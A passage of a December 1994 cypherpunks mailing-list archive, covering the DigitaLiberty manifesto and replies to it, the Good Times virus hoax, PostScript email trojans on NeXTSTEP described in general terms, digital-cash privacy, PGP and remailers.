RE-DISTRIBUTE THIS AS YOU SEE FIT Friends of Liberty, It is becoming increasingly apparent that the arrival of cyberspace is destined to engender a fundamental discontinuity in the course of human relations. This is a source of great optimism and opportunity for those of us who believe in freedom. Many of you who participate in the lively debates that take place in these forums have seen a number of activist organizations spring up claiming to represent the cause of freedom. And if you are like me you have cheered these groups on only to watch them get bogged down in a quagmire of realpolitics. It is a sad fact that the beast in Washington has evolved into a self-perpetuating engine expert at co-opting the principles of even the most ardent reformers. Slowly but surely all those who engage the system are ultimately absorbed into the mainstream miasma of majoritarianism. For example, what can be more discouraging than watching an organization that started out as a cyber-civil liberties group shift its focus to creating new forms of government entitlements while endorsing intrusive wiretap legislation because they didn't want to jeopardize their influence and prestige amongst the Washington power elite? Some of us believe we can seek ultimate redress at the polls. Many pundits have declared our recent national elections a watershed in politics, a turning point that represents the high water mark of big government. Nonsense. The names have changed, the chairs have been rearranged, but the game remains the same. The so-called "choices" we are presented with are false, hardly better than the mock one-party elections held by failed totalitarian regimes. There must be a better way. I would like to announce the formation of a new group - DigitaLiberty - that has chosen a different path. We intend to bypass the existing political process. We reject consensus building based on the calculus of compromise. Instead we plan to leave the past behind, much as our pioneering forefathers did when they set out to settle new lands. It is our mission to create the basis for a different kind of society. If you would like to join us I invite you to read the information below. Yours in freedom, Bill Frezza Co-founder, DigitaLiberty December 5, 1994 -------------------------------------------------------------------------- *** What is DigitaLiberty? DigitaLiberty is an advocacy group dedicated to the principled defense of freedom in cyberspace. We intend to conduct this defense not by engaging in traditional power politics but by setting an active, persuasive example - creating tangible opportunities for others to join us as we construct new global communities. We believe deeply in free markets and free minds and are convinced that we can construct a domain in which the uncoerced choices of individuals supplant the social compact politics of the tyranny of the majority. *** Is DigitaLiberty a political party or a lobbying group? Neither. DigitaLiberty does not seek to educate or influence politicians in the hope of obtaining legislation favorable to our constituents. We plan to make politicians and legislators irrelevant to the future of network based commerce, education, leisure, and social intercourse. DigitaLiberty does not seek to persuade a majority of the electorate to adopt views which can then be forced upon the minority. We hope to make majoritarianism irrelevant. We invite only like minded individuals to help us build the future according to our uncompromised shared values. *** What do you hope to accomplish? DigitaLiberty is not hopeful that widespread freedom will come to the physical world, at least not in our lifetime. Too many constituencies depend upon the largess and redistributive power of national governments and therefore oppose freedom and the individual responsibility it entails. But we do believe that liberty can and will prevail in the virtual domains we are building on the net and that national governments will be powerless to stop us. We believe that cyberspace will transcend national borders, national cultures, and national economies. We believe that no one will hold sovereignty over this new realm because coercive force is impotent in cyberspace. In keeping with the self-organizing nature of on-line societies we believe we will chose to invent new institutions to serve our varied economic and social purposes. DigitaLiberty intends to be in the forefront of the discovery and construction of these institutions. *** But what about the construction of the "Information Superhighway"? The fabric of cyberspace is rapidly being built by all manner of entities espousing the full range of political and economic philosophies. While political activity can certainly accelerate or retard the growth of the net in various places and times it cannot stop it nor can it effectively control how the net will be used. Our focus is not on the institutions that can and will impact the building of the physical "information highway" but on those that will shape life on the net as an ever increasing portion of our productive activities move there. *** What makes you think cyberspace will be so different? The United States of America was the only country in history ever to be built upon an idea. Unfortunately, this idea was lost as we slowly traded away our liberties in exchange for the false promise of security. DigitaLiberty believes that technology can set us free. The economies of the developed world are now making a major transition from an industrial base to an information base. As they do, the science of cryptology will finally and forever guarantee the unbreachable right of privacy, protecting individuals, groups, and corporations from the prying eyes and grasping hands of sovereigns. We will all be free to conduct our lives, and most importantly our economic relations, as we each see fit. Cyberspace is also infinitely extensible. There will be no brutal competition for lebensraum. Multiple virtual communities can exist side by side and without destructive conflict, each organized according to the principles of their members. We seek only to build one such community, a community based on individual liberty. Others are free to build communities based on other principles, even diametrically opposed principles. But they must do so without our coerced assistance. Effective communities will thrive and grow. Dysfunctional communities will wither and die. And for the first time in human history, rapacious societies will no longer have the power to make war on their neighbors nor can bankrupt communities take their neighbors down with them. *** What does this have to do with my real life? I can't eat data. I don't live in a computer. Yes, but imagine the ultimate impact of mankind's transition from an agrarian economy to an industrial economy to an information economy. Our founding fathers would have consider anyone insane who predicted that a nation of 250 million could feed itself with fewer than 3% of its citizens involved in agriculture. Similarly, economist and politicians trapped in the policies of the past lament our move from a manufacturing economy to a knowledge worker and service based economy. We see this as a cause to rejoice. The day will come when fewer than 5% of the citizens of a nation of 1 billion will be involved in manufacturing - if we still bother calling geographically defined entities "nations". What will the rest of us be doing? We will be providing each other with an exploding array of services and we will be creating, consuming, and exchanging information. Most of this will occur entirely within or be mediated at least in part by our activities in cyberspace. Many of us will earn a very good living on the net. Our race, our religion, our gender, our age, our physical appearance and limitations will all be irrelevant and undetectable. Hard working individuals from underdeveloped nations who in the past might have been forced to emigrate in search of economic freedom and opportunity can now build productive lives in cyberspace. And much if not all of the wealth we create that we do not transform into visible physical assets will be ours to keep and use, beyond the grasp of sovereigns. *** What is the purpose of this forum? The DigitaLiberty Forum is a place where like minded individuals can share their views, observations, and strategies related to the development of virtual communities based on freedom. It is a place where people can exchange information and advice about how they have developed extra-territorial business and social relationships - away from the influence and outside the jurisdiction of governments. It is a forum for the posting of essays, questions, and ideas on the topic of liberty. It is a place where we can meet and debate the forms that our new institutions might take and discuss the practical problems and responsibilities that freedom entail. In time as our technology matures some of us will move on to more ambitious projects, launch other programs, and begin our virtual migration from the swamp of coerced collectivism. Best of all, there will be no need to physically move to 'Galt's Gulch' or escape to a floating 'Freedonia'. We can all participate in this exodus without hastily quitting our jobs or disrupting our lives. And as a larger and larger portion of our economic and social activities move onto the net we will create a new society, open to all with the will to enter. This new world will be interleaved with the physical world in which we now live and yet will be separate. And free. Join us as we begin the journey. *** Who can join DigitaLiberty? The DigitaLiberty Forum is open to anyone that can honestly answer yes to the following two questions: 1) I renounce the use of coercive force as a tool of social or economic policy. 2) I do not derive the majority of my income from funds taken from taxpayers. *** How do I join DigitaLiberty? If you qualify, send a message to DigitaLiberty-request at phantom.com with the words "SUBSCRIBE" in the subject line and the message body as follows SUBSCRIBE DigitaLiberty And welcome to the future. ### From iijon at iiit.swan.ac.uk Wed Dec 7 02:44:42 1994 From: iijon at iiit.swan.ac.uk (Jon Care) Date: Wed, 7 Dec 94 02:44:42 PST Subject: Good times virus thing-a-ma-bobber In-Reply-To: <941207010448.20216805@SCSUD.CTSTATEU.EDU> Message-ID: > > Michael K. Sanders is believed to have said: > > >Has anyone actually seen this 'Good Times' thing? I highly doubt > >it. And seriously, an e-mail virus? Get real. > > > Need I remind you of a certain Robert T. Morris? Does the "Internet Worm" mean > anything to you? Sure, it wasn't actual email, but it did use email and other > means of transport to cripple the net in a matter of hours. > > adam Was this a real message, or is someone having us on? I mean, come on, who seriously describes themselves as "MacGuru" AND puts in their anonymous email address as well :) Not very anonymous now is it? > > -=-=-=- > Adam J. Gerstein > MacGuru to the stars > > Available at: > GERSTEIN at SCSU.CTSTATEU.EDU MACGEEK at SCSU.CTSTATEU.EDU > A GERSTEIN at AOL.COM MACGEEK at eWorld.com > an41389 at anon.penet.fi (for anonymity) > -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > -----BEGIN PGP SIGNATURE----- > Version: 2.6 > > iQBWAwUBLq/fYbXVc2UFUOWNAQHu4QIBAQzD1aOCh4DV3Dg4DSJPmNu+1xGDRxND > 0PavaUaBFP7GGT6EneTBwVX1ddL1PFFKdeMf8qo9FgWfG0EOHuHJTkY= > =6rlg > -----END PGP SIGNATURE----- > > -- Jonathan H. Care, i^2it Ltd. -o- PGP public key available. Email: iijon at iiit.swan.ac.uk -o- Tel: +44 1792 295213 Fax:+44 1792 295811 http://www.linux.org.uk/Jon.html -o- My opinions are solely my own. Boo! From lnowlin at igc.apc.org Wed Dec 7 03:03:26 1994 From: lnowlin at igc.apc.org (Lauren Nowlin) Date: Wed, 7 Dec 94 03:03:26 PST Subject: WWW> Visa is pleased to announce ou Message-ID: <199412071103.DAA15934@igc2.igc.apc.org> /* Written 8:05 PM Dec 5, 1994 by sackman at plains.nodak.edu in igc:comp.internet. */ /* ---------- "WWW> Visa is pleased to announce ou" ---------- */ ---------- Forwarded message ---------- Date: Sat, 3 Dec 1994 11:16:57 -0800 (PST) SENDER: James Subject: WWW> Visa is pleased to announce our new Home Page Visa, the largest consumer payment system in the world, is pleased to announce the WWW availability of information about Visa services and products. With more than 11 million acceptance locations worldwide, member financial institutions have issued more than 357 million cards worldwide. Visa also has the leading global ATM network. Besides information on products and services, the Visa Home Page currently includes Financial Tips for Consumers, along with information on technological trends in payment systems. Under "Financial Tips for Consumers", Internet/WWW users can download the financial education program "Choices and Decisions: Taking Charge of Your Life". Features under development include News from Visa, comprised of up-to-date company news releases and a worldwide ATM locator guide. The Visa Home Page is at URL: http://www.visa.com/visa/ Contact your local Visa member bank for regarding services and products available in your specific area. ----------------------------------------------------------------------- Jim Hunter (Webmaster) jshunter at net.effects.com http://www.net.effects.com From lmccarth at ducie.cs.umass.edu Wed Dec 7 03:44:18 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Wed, 7 Dec 94 03:44:18 PST Subject: giving one's "anonymous" address Message-ID: <199412071149.GAA10149@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Adam J. Gerstein writes: > MacGuru to the stars > > Available at: > GERSTEIN at SCSU.CTSTATEU.EDU MACGEEK at SCSU.CTSTATEU.EDU > A GERSTEIN at AOL.COM MACGEEK at eWorld.com > an41389 at anon.penet.fi (for anonymity) Jon Care writes: # Was this a real message, or is someone having us on? I mean, come on, who # seriously describes themselves as "MacGuru" No comment :> # AND puts in their anonymous email address as well :) # # Not very anonymous now is it? I think the idea is that email sent to an anXXXXX at anon.penet.fi address will be anonymized by the penet server, so you can establish a conversation channel with MacGuru here without setting up a reply block through some remailers. In some newsgroups where anonymous posting is common, listing of several "anonymous" email addresses in .sigs is also common. - - -L. Futplex McCarthy; PGP key by finger or server "We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuWf82f7YYibNzjpAQHbCwQA0BX3Gd+OUL1GEYiRF/cv+Bv8Z10vAPiq jwjhchrMgOhBdM190jJGW/92owy3fxdMm4LWOo5ymYfSPQsfS0JAg0P5BHy5A79i YND9u5BudUBYtLOZqxCU1PKJ5Ud1x2ZVieppgx+dl4x+vD/brxQpgTzK+pv8NIMX gjUR44FPDmY= =nQXp - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuWhJyoZzwIn1bdtAQHyaQF/WXIZnjd9AmswPdm2YH9P6G0fnMXAMfHX rC4ewLaC7SwNmsZjTvLFg4IFgqRJ+ae9 =cnyv -----END PGP SIGNATURE----- From dmandl at panix.com Wed Dec 7 03:51:21 1994 From: dmandl at panix.com (David Mandl) Date: Wed, 7 Dec 94 03:51:21 PST Subject: SWM seeks cryptographer Message-ID: <199412071151.AA11625@panix.com> A friend of mine who works for a publisher of kids' books is looking for a real (professional) cryptographer to interview for an upcoming book. I'm not sure of all the details, but I think they want to ask you what crypto is all about, how it works, why it's used, etc. I think he said they'll even include your photo in the book. Anyway, this is sketchy, but you can get more details by talking to him. He's a good friend and a nice guy (and very sympathetic to the cypherpunk cause). Feel free to contact him directly at: rusty at panix.com His name is Rusty. Thanks. --Dave. -- Dave Mandl dmandl at panix.com From dmandl at bear.com Wed Dec 7 06:32:58 1994 From: dmandl at bear.com (dmandl at bear.com) Date: Wed, 7 Dec 94 06:32:58 PST Subject: Announcing - The DigitaLiberty Forum Message-ID: <9412071430.AA05954@yeti.bsnet> > From: You're infringing on hundreds of people's liberty by mailbombing dozens of inappropriate mailing lists with this junk (I got _two_ copies, and I'm only subbed to one of those lists). I might almost be intrigued if there were a shred of a concrete proposal of some kind in here, but of course there isn't: it's just the usual vague Libertarian pipe dreams. But any time I see a manifesto this long-winded, jargon-filled, and devoid of tangible ideas, that's exactly what I expect. My favorite quote: > launch other programs, and begin our virtual migration from the > swamp of coerced collectivism. Best of all, there will be no need to > physically move to 'Galt's Gulch' or escape to a floating 'Freedonia'. We > can all participate in this exodus without hastily quitting our jobs or > disrupting our lives. Whew, _that's_ a relief! When I achieve complete liberty I certainly don't want it to make me quit me job or disrupt my life in any way! --Dave. From rsk at gynko.circ.upenn.edu Wed Dec 7 06:36:19 1994 From: rsk at gynko.circ.upenn.edu (Rich Kulawiec) Date: Wed, 7 Dec 94 06:36:19 PST Subject: Announcing - The DigitaLiberty Forum In-Reply-To: <9412062258.AA23412@dockmaster.phantom.com> Message-ID: <9412071349.AA17537@hazel.circ.upenn.edu> >The DigitaLiberty Forum is open to anyone that can honestly answer yes to the >following two questions: > >1) I renounce the use of coercive force as a tool of social or economic >policy. > >2) I do not derive the majority of my income from funds taken from >taxpayers. Ah, a litmus test at the door for DigitaLiberty's version of political correctness in order to see if one is worthy to speak (or listen). So much for all the rhetoric about liberty and freedom: by #2, you've just ruled out everyone who works in any federal, state or local government agency, defense, aerospace and communications contractors, public universities and schools...shall I go on? Hmmm, and by #1 you've also ruled out anyone who supports their local police department. I presume, then, that you won't be calling them should someone threaten your person or possessions. Your forum isn't about *our* digital liberty, it's about *your* personal political agenda -- why not come right out and clearly label it as such, rather than disguising it? ---Rsk From anonymous-remailer at shell.portal.com Wed Dec 7 06:47:34 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 7 Dec 94 06:47:34 PST Subject: BACKING E$ Message-ID: <199412071447.GAA06381@jobe.shell.portal.com> Sun, 4 Dec 1994, Jim McCoy wrote: MC|IAs far as a real system goes, you will never see on running on a machine |in the US in the near future; in addition to the regulatory BS involved in |making magic money useful you would run into all kinds of wonderful |gambling laws and regulation. Which is why the digital money with the most chance of succeeding will be cyber-marks, -francs or -pounds, not cyber-dollars. Work with the currency of a country with fewer regulatory agencies. The chances of being allowed to stay in business increase directly as the number of government witchhunters decrease. Personal note here: in the past, I have been involved in several anti- govt ventures, always with a view to altering the status quo in favor of freedom fighters and kindred spirits. Some are still going strong, others have been victims of harrassment and even in some cases raids.. Of the unsucccesful ventures - the ones that were closed down by Big Brother Sam - the true reason has always been that we were too smart and getting away with whatever we were doing at the time. So instead, govt found some bogus charge to shut us down with. (In one of the cases they bombed us with orchestrated tax audits, one after another. Later, we were hit with Willful Failure to File something new they called an Environmental Impact Report; this was in a case of knocking down a storage shed! If you think this is "BS", get the last case: On TV, we had an associate promise a free bonus gift to the first 100 callers to a promotion. Upon shipping, we decided to give away the free bonus to *all* callers, a few thousand all told. This amounted to felonies of fraud, mail fraud and enough to put our associate away for up to 10. Of the succesful ventures, all have had one thing in common: they have been headquartered abroad. Our people there have had both Scotland Yard and Dutch police look over the operations, always on the request of the Americans. We have even had an Inland Revenue investigation, requested by the IRS. In all cases, the govt went away empty handed and as good friends - agents even apologized for the inconvenience. Their word to their U.S. colleagues: "We will not shut down someone who is not doing anything illegal. We may not agree with their political aims, but this in itself is insufficient basis for prosecution." ObCrypto: Anarcho-capitalists take note here, 1. In the U.S., the totality of federal regulations now comes to 202 volumes numbering 131,803 pages. "They" can *always* find something in there to shut you down with. Their aim is to seize what you have and put you out of business because you are not giving in to their demands. 2. Abroad, regulations are oftentimes of the common sense variety. If you are a crook, you can and will be shut down. But if - like me - you are honest, hardworking and just happen to not agree with U.S. policies of oppression, then you will be free to run your affairs as you see fit. 3. If the operator of a succesful digital cash currency achieves for his money more than play-money status, he will be intimidated into providing traceability. Sorry: there is no way he can insulate himself even with prior legal briefs and a team of top lawyers. I have been through it personally. We even had a bank in the seventies. If the bureaucrats target you, they *will* get you. Sure, you can fight. You won't win. Conclusion: I only see 'untouchable' digital cash of having integrity and a decent rate of survival if based abroad. Personal experience tells me that it should be pegged to the pound sterling. A futuristic twist with more widespread appeal to non-Europeans would be to peg it to the ECU although marketing could be tough this side of the common currency (year 2000?). If pegged to the ecu, HQ should still be in London. Have James Capel or some such handle the escrow account to guarantee real-money backing and -conversion. Individual accounts can be located anywhere and should stay out of mainland U.K. Sorry for the length of this post. Early choices now could mean the difference between future success and the alternative: headaches + the eventual inevitable caving in. "Capt'n Bob" Am still looking for a pseudonymous address. Suggestions welcome. From michael.shiplett at umich.edu Wed Dec 7 08:08:57 1994 From: michael.shiplett at umich.edu (michael shiplett) Date: Wed, 7 Dec 94 08:08:57 PST Subject: Book Review pointer... Message-ID: <199412071608.LAA21462@totalrecall.rs.itd.umich.edu> sci.crypt contains a book review of _The Hobbyist's Guide to COMINT Collection and Analysis_, written and published by Tom Roach. Sounds like it may be interest to some folks here. michael From hfinney at shell.portal.com Wed Dec 7 08:45:06 1994 From: hfinney at shell.portal.com (Hal) Date: Wed, 7 Dec 94 08:45:06 PST Subject: Ideal digital cash system? In-Reply-To: Message-ID: <199412071644.IAA19261@jobe.shell.portal.com> Johnathan Corgan writes: >The authors consider this the first ideal untraceable electronic cash >system. >T. Oamoto and K. Ohta, Universal Electronic Cash >Advances in Cryptology--CRYPTO '91 Proceedings >Berlin: Springer-Verlag 1992 pp. 324-337 (This should be Okamoto & Ohta.) This paper is not available electronically as far as I know. The crypto proceedings can be found in good university libraries. I believe the Okamoto scheme has the problem that payments by a person are all linkable. Basically when you open an account with the bank you get a "license" number B which you keep for all the time (and which the bank doesn't know). But every time you spend you have to send B. So all of the payments from a person will use the same B. True, this doesn't reveal his identity, but it allows a given pseudonym's spending patterns to be recorded and studied, which may be almost as bad. Okamoto forgot unlinkability in his laundry list of ideal cash characteristics. Hal From GERSTEIN at SCSUD.CTSTATEU.EDU Wed Dec 7 08:45:51 1994 From: GERSTEIN at SCSUD.CTSTATEU.EDU (Just call me Flame-bait) Date: Wed, 7 Dec 94 08:45:51 PST Subject: Good times virus thing-a-ma-bobber Message-ID: <941207114718.2021812c@SCSUD.CTSTATEU.EDU> Jon Care (iijon at iiit.swan.ac.uk) is believed to have said: >Was this a real message, or is someone having us on? I mean, come on, who >seriously describes themselves as "MacGuru" AND puts in their anonymous >email address as well :) > >Not very anonymous now is it? I'm sorry, I didn't know that I wasn't allowed to have fun _and_ be on this list. The MacGuru was picked up here on campus, and since I rarley send mail off campus, I usually forget to turn it off. As far as having the anon address in my sig, L. McCarthy said: >I think the idea is that email sent to an anXXXXX at anon.penet.fi address will >be anonymized by the penet server, so you can establish a conversation >channel with MacGuru here without setting up a reply block through some >remailers. In some newsgroups where anonymous posting is common, listing of >several "anonymous" email addresses in .sigs is also common. I did this for the exact same reason. If someone wants to mail me anonymously, they have the option to just mail my anon account. What's so wrong with that?? >The message itself reeks of the typical chain letter-- oh please send >this to absolutely everyone you know with email! It'll help them lots! > >Yeah, whatever. Someone (I'm not sure who) brought up the point that the file could actually be an ANSI bomb. It seems to me that for the IBM and clone users on the 'net, this could be something that they would want to watch out for. Now we all know that it wasn't real (and many of you just "knew" it wasn't), it doesn't matter, does it? -=-=-=- Adam J. Gerstein MacGuru to the stars Available at: GERSTEIN at SCSU.CTSTATEU.EDU MACGEEK at SCSU.CTSTATEU.EDU A GERSTEIN at AOL.COM MACGEEK at eWorld.com an41389 at anon.penet.fi (for anonymity) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From andrew_loewenstern at il.us.swissbank.com Wed Dec 7 08:47:22 1994 From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern) Date: Wed, 7 Dec 94 08:47:22 PST Subject: (Fwd) Read this, Virus info!! Message-ID: <9412071644.AA00278@ch1d157nwk> Michael K. Sanders writes: > Has anyone actually seen this 'Good Times' thing? I highly doubt > it. And seriously, an e-mail virus? Get real. and Ian Farquhar writes: > And pigs fly too. Laugh if you want, but this has been possible for years under NeXTSTEP. With it's Display PostScript system and rich text mail reader, it's easy to send a PostScript trojan horse via e-mail. As soon as the message is read, the Mail app tries to display the text and any images inside, which is probably what it should do. However, because EPS images are really just PostScript code, you can do write a PostScript program that does all sorts of nasty things, which includes reading and writing files, stick an EPS header on it, and drop it into a mail message. The recipient's mail reader will cheerfully run the received EPS image through the PS interpreter... All of the EPS trojan horses I have seen do cute, but harmless, things like melt your screen, make windows fly around, rearrange your dock, or display animation before returning things to normal, but they could just as easily erase your home directory or just about anything else. After this major security hole became public knowledge, NeXT provided for 'secure' postscript contexts (safe-DPS if you will) where some of the nastier postscript operators were disabled. Anyway, it's more than possible, even when the designers didn't originally bargain for any type of 'enabled mail.' And with the proliferation of Display PostScript based X servers and MIME mail tools, and other more advanced mail systems on other platforms, we will probably see much more of this type of thing. andrew From p.v.mcmahon.rea0803 at oasis.icl.co.uk Wed Dec 7 09:49:13 1994 From: p.v.mcmahon.rea0803 at oasis.icl.co.uk (p.v.mcmahon.rea0803 at oasis.icl.co.uk) Date: Wed, 7 Dec 94 09:49:13 PST Subject: GUCAPI Message-ID: <9412071749.AA07438@getafix.oasis.icl.co.uk> A few comments on GUCAPI postings follow. 1. It has been suggested that GSS-API is appropriate for layering over PGP security functions, but this is incorrect, as GSS-API is inappropriate for store-and-forward applications (and associated security mechanisms), and hence isn't suitable for all applications which have security requirements. 2. The application level interfaces for messaging applications must include object protection semantics. One proposal being considered for this is available by ftp as draft-ietf-cat-iop-gss-00.txt from ds.internic.net in /internet-drafts. There is a BOF on this today at the IETF which other CP IETF correspondent(s) may want to report on. 3. A distinction can and should be made between the higher level interfaces which combine information protection and authentication, and the lower level interfaces to cryptographic transforms and key exchanges which aren't bundled with any trust model or certification infrastructure. 4. The lower level cryptographic interfaces (CAPIs) are the subject of numerous proposals. A few of these were listed in the note I sent to the list yesterday about the recent NIST meeting. One proposal being developed by major vendors (IBM, HP, Sun etc) and to be trialled in practical implementations is available from X/Open, together with an associated email discussion list. Mail me if you want to be part of the review process, or just track developments in this area. (This is intended to be a net standard and an industry standard :-). - pvm From adam at bwh.harvard.edu Wed Dec 7 10:42:14 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Wed, 7 Dec 94 10:42:14 PST Subject: (Fwd) Read this, Virus info!! In-Reply-To: <9412071644.AA00278@ch1d157nwk> Message-ID: <199412071844.NAA00693@hermes.bwh.harvard.edu> andrew wrote: | Anyway, it's more than possible, even when the designers didn't originally | bargain for any type of 'enabled mail.' And with the proliferation of | Display PostScript based X servers and MIME mail tools, and other more | advanced mail systems on other platforms, we will probably see much more of | this type of thing. safe-tcl is designed to allow for enabled mail without opening up many security holes like this. Unfortunately, few people use safe-tcl. I suspect that a lot of this is becuase many of the people who would get lots of benefit from safe tcl's basic functions (like mail sorting) use procmail to do those basic functions. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From rfb at lehman.com Wed Dec 7 11:00:20 1994 From: rfb at lehman.com (Rick Busdiecker) Date: Wed, 7 Dec 94 11:00:20 PST Subject: fixed code In-Reply-To: <199412060248.VAA04314@bwh.harvard.edu> Message-ID: <9412071858.AA15197@cfdevx1.lehman.com> From: Adam Shostack Date: Mon, 5 Dec 94 21:48:37 EST The procmail stuff I sent yesterday was slightly broken. It seems that keyservers respond well to 'mget 36E61FB1', but not 'get 36E61FB1' The form "get 0x36E61FB1" works also. Rick From Tony.Gurnick at nzdairy.co.nz Wed Dec 7 11:08:16 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Wed, 7 Dec 94 11:08:16 PST Subject: PGP 2.6.2 Message-ID: <94120808041708@nzdairy.co.nz> I`m looking for an ftp site for pgp 2.6.2 or greater outside of the us. Ive tried ftp.dsi.unimi.it but they only have 2.6.1. Any IDEA? (joke) T From skaplin at skypoint.com Wed Dec 7 11:54:55 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Wed, 7 Dec 94 11:54:55 PST Subject: Anybody got a procmail recipe? In-Reply-To: <199412070850.DAA29419@bb.hks.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <199412070850.DAA29419 at bb.hks.net>, you wrote: > > Couldn't you just use, for example, > soc.singles at myriad.pc.cc.cmu.edu > as the contents of your .forward file ? Well, lets see if this address works. I tried all of the gateways listed in the cyphernomicon and all of my messages to alt.security.keydist at whatever.gateway either bounced or vanished into the vast cyberspace void. I was going to do it the hard way. The problem is I can't throw extra info into the header to route the messages through a remailer. Hmmm...worse comes to worse I probably could make procmail do it...something to ponder. ============================================================================== "No free man shall ever be de-barred the use of arms. The strongest reason for the people to retain their right to keep and bear arms is as a last resort to protect themselves against tyranny in government." -Thomas Jefferson ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLuYR28lnXxBRSgfNAQHUeQf9EXelanl+5BVUsE10cBfNfvn2dmjyz2eA FQQK3Z8EmOSfHY+vR5e7NEfXpZX3HSxliMpV9pk9Da6mi9MUtWKjDQopOCRkzZ9r gaTZpwUdQZDOoySq7ZUIVqpnEWFGW7aRClhi20On/nQw3+W5EZ+BVErT6kWmfMyq cKUXdDCmLYwk/SojlNBEtn4wiwP4+36hdem5QqFNsSzkA7W7kEDUK9WqDZPeA5vG abygdRsQJp+FSytmR6eIDtd3C8HzYvMJGrS6RaDYpuyiLThb8oXWvHfEPNxPzxv4 vXl6XrcPTfqdyYsgKtmiirZRqxhyiy/Wq1UHNoEVkMZuvqGO/DZANw== =twoD -----END PGP SIGNATURE----- This message digitally signed to verify the identity of the writer. From jltocher at CCGATE.HAC.COM Wed Dec 7 12:08:11 1994 From: jltocher at CCGATE.HAC.COM (jltocher at CCGATE.HAC.COM) Date: Wed, 7 Dec 94 12:08:11 PST Subject: 2048 bit key generation with 2.6.2 Message-ID: <9411077868.AA786830835@CCGATE.HAC.COM> I changed my system date (Ho! Ho! Ho!) in order to test the generation of 2048 bit keys. Key view shows the key as having 2047 bits. Can someone tell me what's goin' on? Please reply by E-Mail; I'm currently not on the list because of the volume. Regards, John ______________________________________________________________________________ John L. Tocher THE CITY-a bounded infinity. A labyrinth where JLTocher at CCgate.HAC.com you are never lost. Your private map where every PGP Fingerprint: block bears exactly the same number. Even if you CE 72 1A 11 07 47 35 35 lose your way, you cannot go wrong. --Kobo Abe 9A C1 DE EA 64 21 BC 94 "The Ruined Map" ============================================================================== To get my PGP key send mail with subject "Get Key" ============================================================================== From sq0nk at alt.anonymous.messages Wed Dec 7 12:25:32 1994 From: sq0nk at alt.anonymous.messages (Random Factor) Date: Wed, 7 Dec 94 12:25:32 PST Subject: Remailers and "##" In-Reply-To: <199412052125.QAA08290@cs.oberlin.edu> Message-ID: <199412071922.AA13633@xtropia> -----BEGIN PGP SIGNED MESSAGE----- > Date: Mon, 5 Dec 1994 16:25:23 -0500 > From: Jonathan Rochkind > Subject: Remailers and "##" > > I know there's some kind of a syntax you can use involving "##", with > some of the remailers, and the remailer will insert a header line > into the message. most remailers will not let you set the From: line this way. could one of the remailer operators tell us why? it doesn't make sense to me. randy -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLuX/Nc1Uod4Abd1NAQGuSgQAnZ9CtNpH0djHhRvgF2OEm1Sts507KhxE 3Hc40qAOIpmc7OvdfzxNqa+3j0zqZO/iclPBrdOgLFW6DumIYDFdvlJBOZ4V6lyM z7VRI0vdKpE6/tYwdCwGKlyok/7xgBhS5L+oe+qq/LzPARCUF2F/ZX9PGfpfQCYm c3vXdM2sCBY= =Vr+z -----END PGP SIGNATURE----- From tcmay at netcom.com Wed Dec 7 12:35:40 1994 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 7 Dec 94 12:35:40 PST Subject: Warning about a message I may have sent Message-ID: <199412072035.MAA20871@netcom10.netcom.com> I may have accidentally sent a message to the list that I was intending to send just to myself, from my offline mailer Eudora (as opposed to elm, which I'm now on). As usual during any time Netcom is crowded, it is apparently not accepting connections from toad.com, and so I am not seeing traffic sent to the list (No, I don't need any of you to offer to send it to me...it'll arrive when toad retries the connection some hours from now and Netcom deigns to accept it. A run-of-the--mill mistaken message would not be an issue, but this a BIGGIE, a 43K file of a paper I just completed that I was planning to offer as an attachment to a mail message. So, I was testing the whole thing. But I may've typed in the list name instead of mine. Oh well. If it arrives, it's the text only version of a paper submitted to the "Imagina 95" conference to be held in February in Monte Carlo. I guess random posts to the list are the Monte Carlo method in action. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay From dmandl at bear.com Wed Dec 7 13:04:25 1994 From: dmandl at bear.com (dmandl at bear.com) Date: Wed, 7 Dec 94 13:04:25 PST Subject: Warning about a message I may have sent Message-ID: <9412072102.AA18703@yeti.bsnet> > From: > > I may have accidentally sent a message to the list that I was > intending to send just to myself, from my offline mailer Eudora (as > opposed to elm, which I'm now on). [...] > If it arrives, it's the text only version of a paper submitted to the > "Imagina 95" conference to be held in February in Monte Carlo. Sorry, Tim, but if it's not digitally signed by you with a valid key, that baby's up for grabs. Monte Carlo here I come... --Dave. From greg at ideath.goldenbear.com Wed Dec 7 13:20:26 1994 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Wed, 7 Dec 94 13:20:26 PST Subject: Remailers and "##" In-Reply-To: 